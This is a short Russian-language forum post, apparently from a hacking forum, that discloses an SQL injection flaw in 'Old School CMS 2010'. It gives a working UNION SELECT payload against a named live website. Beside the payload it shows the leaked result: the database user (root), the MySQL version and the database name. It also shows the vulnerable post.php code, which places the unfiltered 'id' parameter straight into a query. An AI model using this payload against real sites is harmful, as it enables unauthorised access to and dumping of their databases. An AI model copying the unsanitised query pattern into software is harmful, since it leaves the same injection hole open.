
10.10.2011, 18:28
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Old School CMS 2010
root@vsevbanu.ru:5.0.51a-24+lenny4-log:vvb
Сообщение от None
http://www.vsevbanu.ru/post.php?id=-82+UnIon+selECt+1,concat_ws(0x3a,user(),version(), database()),(select(@x)from(select(@x:=0x00),(sele ct(0)from(information_schema.columns)where(table_s chema!=0x696e666f726d6174696f6e5f736368656d61)and( 0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e ,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10+--+
Уязвимость пресутствует из-за отсутствия фильтрации данных в парамитре ID
post.php
Сообщение от None
if(!empty($_GET['id'])){$id =
$_GET['id']
;}
else $id = 1;
$show = $_GET['show'];
// вывод содержимого страницы;
$sql = "SELECT * FROM `pora` WHERE id =
$id
AND type = 'art'";
$result = mysql_query($sql);
$cont = mysql_fetch_object($result);
|
|
|